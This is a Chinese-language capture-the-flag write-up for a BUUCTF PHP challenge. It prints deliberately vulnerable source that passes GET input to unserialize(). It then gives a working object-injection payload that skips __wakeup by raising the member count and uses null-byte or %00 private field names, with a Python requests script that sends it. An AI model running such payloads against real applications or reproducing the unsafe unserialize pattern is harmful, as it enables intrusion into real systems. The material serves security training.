BUUCTF--极客大挑战php

文章目录

• 1.网站备份文件`www.zip`
• 2.下载后发现
• • `class.php`
  • `index.php`
  • `flag.php`
• 3.分析php代码
• `绕过__wakeup方法`
• `变量权限为私有或保护`
• • `python方法`
  • `url方法`

1.网站备份文件www.zip

2.下载后发现

class.php

<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "
NO!!!hacker!!!
"; echo "You name is: "; echo $this->username;echo "
"; echo "You password is: "; echo $this->password;echo "
"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "
hello my friend~~
sorry i can't give you the flag!"; die(); } } } ?>

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12
• 13
• 14
• 15
• 16
• 17
• 18
• 19
• 20
• 21
• 22
• 23
• 24
• 25
• 26
• 27
• 28
• 29
• 30
• 31
• 32
• 33
• 34
• 35
• 36

index.php

<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>

• 1
• 2
• 3
• 4
• 5

flag.php

<?php $flag = 'Syc{dog_dog_dog_dog}'; ?>

• 1
• 2
• 3

3.分析php代码

由index.php中，得到网站GET传参select，将传进的数据，进行反序列化；重点是class.php，通过代码分析，构造析构函数中username必须是admin，password必须是100，才能包含flag.php

function __destruct(){ if ($this->password != 100) { echo "
NO!!!hacker!!!
"; echo "You name is: "; echo $this->username;echo "
"; echo "You password is: "; echo $this->password;echo "
"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "
hello my friend~~
sorry i can't give you the flag!"; die(); }

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12
• 13
• 14
• 15
• 16

__destruct() 是一个特殊的 PHP 魔术方法（Magic Method），用于在对象实例被销毁时执行一些操作。当没有任何引用指向一个对象或者显式地调用 unset() 函数时，对象就会被销毁，此时 __destruct() 方法会被调用。

function __wakeup(){ $this->username = 'guest'; }

• 1
• 2
• 3

在PHP中，__wakeup() 是一个特殊的魔术方法（magic method），它在反序列化一个对象时被调用。当使用 unserialize() 函数从字符串中重新创建对象时，如果该类中定义了 __wakeup() 方法，那么在反序列化后将立即调用该方法
也就是说，当我们即使传参admin，100的值后，当实类被反序列化调用时,__wakeup函数会被自动调用，username也会将admin调换成guest
所以就要绕过__wakeup方法就可以了，

绕过__wakeup方法

当序列化的中的成员数大于实际成员数，就会跳过__wakeup方法的执行

<?php class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } } $a = new Name('admin', 100); echo serialize($a) ?>

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12
• 13
• 14
• 15
• 16
• 17
• 18

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

• 1

将类Name后的2，改为3，即可绕过

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

• 1

变量权限为私有或保护

参考链接：https://blog.csdn.net/weixin_45844670/article/details/108171963

private是私有字段，只有在所声明的类中可见，子类和该类的实类都不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀

python方法

import requests url = "http://fdc1a5b4-4e8c-4077-8471-748df3708de0.node5.buuoj.cn:81/" ruqset = requests.get(url+'?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}') print(ruqset.text)

• 1
• 2
• 3
• 4

url方法

将\0改为%00

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

• 1